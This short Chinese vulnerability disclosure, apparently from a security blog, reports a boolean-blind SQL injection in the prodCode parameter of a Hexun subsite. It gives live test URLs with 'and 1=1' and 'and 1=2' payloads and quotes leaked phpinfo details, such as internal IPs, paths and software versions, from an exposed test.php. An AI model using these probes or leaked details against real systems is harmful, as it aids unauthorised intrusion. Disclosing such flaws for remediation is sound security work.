和讯网分站sql注入外加敏感信息泄露一处注入点…外加一个敏感信息的泄露…、、、、 http://licaike.hexun.com/GjzDetail.action?prodCode=400008&prodType=S 其中prodCode存在问题 加个引号报错 数字型的bool盲注 http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=1&prodType=S 真 http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=2&prodType=S 假 假是一个服务器错误页面 另外该服务器同时支持php的解析,目测应该是LAMP的套件安装的。 就这样侧漏了 http://licaike.hexun.com/test.php 存在了phpinfo PATH /usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin SERVER_SIGNATURE no value SERVER_SOFTWARE Apache/2.2.23 (Unix) PHP/5.3.23 SERVER_NAME licaike.hexun.com SERVER_ADDR 10.2.21.22 SERVER_PORT 80 REMOTE_ADDR 10.3.2.22 DOCUMENT_ROOT /usr/local/apache2/htdocs SERVER_ADMIN you@example.com SCRIPT_FILENAME /usr/local/apache2/htdocs/test.php 修复方案: 删除test.php文件 |
-
上一篇: ThinkPHP的Ubb标签漏洞读取任意内容 – 网站安全 –
下一篇: 某高校学生管理系统存在通用SQL注入(安全机制绕
评论前必须登录!
立即登录